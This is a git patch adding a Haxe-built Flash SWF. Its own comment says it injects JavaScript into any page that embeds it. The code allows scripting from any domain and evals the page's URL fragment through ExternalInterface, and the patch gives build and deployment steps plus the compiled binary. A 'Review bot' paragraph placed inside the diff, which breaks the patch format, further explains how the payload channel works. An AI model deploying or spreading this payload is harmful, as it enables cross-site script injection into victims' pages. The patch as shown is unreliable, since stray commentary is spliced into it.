From e6646686597d58c5a95998c93baae54d72029491 Mon Sep 17 00:00:00 2001 From: Jann Horn Date: Wed, 16 Apr 2014 17:44:50 +0200 Subject: [PATCH 1/1] i --- Xss.hx | 47 +++++++++++++++++++++++++++++++++++++++++++++++ compile.hxml | 3 +++ demo.html | 2 ++ xss.swf | Bin 0 -> 2669 bytes 4 files changed, 52 insertions(+) create mode 100644 Xss.hx create mode 100644 compile.hxml create mode 100644 demo.html create mode 100644 xss.swf diff --git a/Xss.hx b/Xss.hx new file mode 100644 index 0000000..c59933a --- /dev/null +++ b/Xss.hx @@ -0,0 +1,47 @@ +// xss.hx +// +// Purpose: +// This haxe source file builds a SWF which injects JavaScript into the including page. +// +// To build: +// 1. Acquire the latest stable version of haxe from http://haxe.org/download +// Note: To run haxe, you may also need Neko (http://nekovm.org/download) +// 2. Create a file called xss.hx with these contents. +// 3. Create a file called compile.hxml with the following content: +// -swf-version 9 +// -swf xss.swf +// -main xss +// 4. From the command line, execute: +// haxe compile.hxml +// +// To activate: +// 1. Take xss.swf generated by haxe and deploy it to your webserver. +// 2. Embed it into your HTML file with code like the following: +// +// + +import flash.external.ExternalInterface; + +class Xss { + + public static function main() { + flash.system.Security.allowDomain("*"); + ExternalInterface.call( [ "(function(){setTimeout(\"", + "eval(document.location.hash.slice(1))", + "\",0);})" ].join('') ); + } + +} diff --git a/compile.hxml b/compile.hxml new file mode 100644 index 0000000..081a044 --- /dev/null +++ b/compile.hxml @@ -0,0 +1,3 @@ +-swf-version 9 +-swf xss.swf +-main Xss diff --git a/demo.html b/demo.html new file mode 100644 index 0000000..787b23c --- /dev/null +++ b/demo.html @@ -0,0 +1,2 @@ + 
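Review bot: The build steps in the Xss.hx header do not match what this commit adds: the comment says to create `xss.hx` and put `-main xss` in compile.hxml, but the file is `Xss.hx`, the class is `Xss`, and the committed compile.hxml says `-main Xss`; Haxe class names are case-sensitive and the source file must carry the class name, so following the comment verbatim will not build. Change the two comment lines to `// 2. Create a file called Xss.hx with these contents.` and `// -main Xss`. The header should also say what the two security-relevant lines in main() do, e.g. `// Security.allowDomain("*") permits content from any domain to script this SWF; the ExternalInterface call then evals the embedding page's URL fragment as JavaScript in that page's origin (the fragment is not sent to the server, which is presumably why it is the payload channel).` The embed in demo.html does not survive in this view, but ExternalInterface can only reach the page when the embed's allowScriptAccess setting permits it, so the "To activate" step is the place to state that requirement.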
diff --git a/xss.swf b/xss.swf new file mode 100644 index 0000000000000000000000000000000000000000..5564f3576de2cb686976a739cbb63048ec02f276 GIT binary patch literal 2669 zcmV-z3X=6hS5pa!4*&po+J#o#ZyU!E-?^_neuyF|O0+G@rfo{3oU=qbiIdn#ELjpo zDYj@w@<-xGybs>#E+Kge?HJPZt2;*2s%f4*|LYBl%qyj$0tMy#h} ze&L(VhE_`~^ogYg?v`elC-PRSVfc>Q$WK1;On=R(n{La`pC323wOYRF8m+q7@TY37 zp)su~J26eh2KHF?hV{jF=$(^}Ql%_+mJPtUHtK7FN7xH_%3oSN@6 zgil?kA+7pNr?Dv*7^1-9;~#onxEG_3L59|FDLQ7Y%K4T!+iYq(V$Erop19C#y3G(O z`T<36x^B(X8gcJ4XRBhk4bN}34Bu@^TUt}Ad%Ul0ih*ANHT`I%;sqyHnx-LawLDv@ znT<`~hCC=R88aKLdc}A9N~rCiL#<($uEiW80FkCycel+s+o@FtDis3{Z&v&!A}DVn zYK#c64CdS#MrUElX44Z|PQy>&*{0vq#YpjUILOj%)-|8M<>(X($Br22;ZSwFt(vwI zy6tW|=3LF$8ej(;S%?)+Yj}d?qUWkSaH_s7 zK4xp;2Gx;+m}WxoF*OdFDccIjYK9wHo9t##cS)D_<7aa3M#;AhIK!(rYIbTT^g5H2fur43=Z}{Cq>itlwfzV)RRe?o}^=dV? zny!z~R4O9+-)zWh+ft~sn|FPhP$;RF#ruy z!u~@u>R=vUlr5=ePI2~D5K|r-hS!=+p}`nzG1krYyAN8T8@JEC(SRVi>3cnSjLBnmR+!&Dfg z5T}r!kfbm~#bF8~6w(w<@SDOeOXX~?GFQ23NWjY6G5gMv$8 zi^As=niM<=EehKdzM!x};Y$inDExp5Us3oW1zdkbp$!y%jK5v{{RDqM#ox~$M*v@e z|NrCI4goE5gm6iu`mzg1Mv-Gmgp-Mkq%8L>N$`O&$$-YcWKRsS;^D%P`QAbgw* z5g|!N6A(R};0Den_*ga}3}zBy{QZQKIFX>q*@QfFmW(ri@4((vCgP z67NOusU0(f_$VPEUD&rqcG2QHzN@Bn5l=qB;mIdqUl*)X-ta#T4gv>C_M5icRmOwB zkW?mcDG@Tji6Cb83J)&6DB#ILSLIV!z==|)`-f7T60%p=FQ7bEf^Zs7Bryyf@@m=| z$h4y=tllD{tueNi&w!dnu|2@Hm_3L|4RV-wN=+9tq#bQXpLaXppT}=;9>4tp zGEc{!s}okPoqu-dca0D=y&heT66VVqC{B|0czgVLS9#06$OK*cHMZq!g>4<{Ql>q{ z(7FV1kzsbpnzjqmNE z{z-5GJws-lXwVMY#v`l)sUFhhGuUxgLUQ6i2M0RE?~<~LhT(~A<{6E23B&Y^XuQTu zqKgXaVUnhI^_g>mRI3i2&U*ktnNv9sO)`+EeEcU~a^3h=u9hTGa zOx}4Vlm8tg4rP$$%gBzx`U{2?Rz7BP7{7?e{;CIcKe$IJ1VQ&2KDN3+-Zgk&9o(i-MU>XUWi^ zoAlVj_+JMHT|Dcwi1yRpx5p_7b&njpH2ZhYY>X3tJA(PXg7r?OoljxIsS|s4?yz+(9KE?|d>9_`W43|P@x!>XFJI@0 b26rHpE8l=s#96gWP`sxG&4Y1V$cl literal 0 HcmV?d00001 -- 2.20.1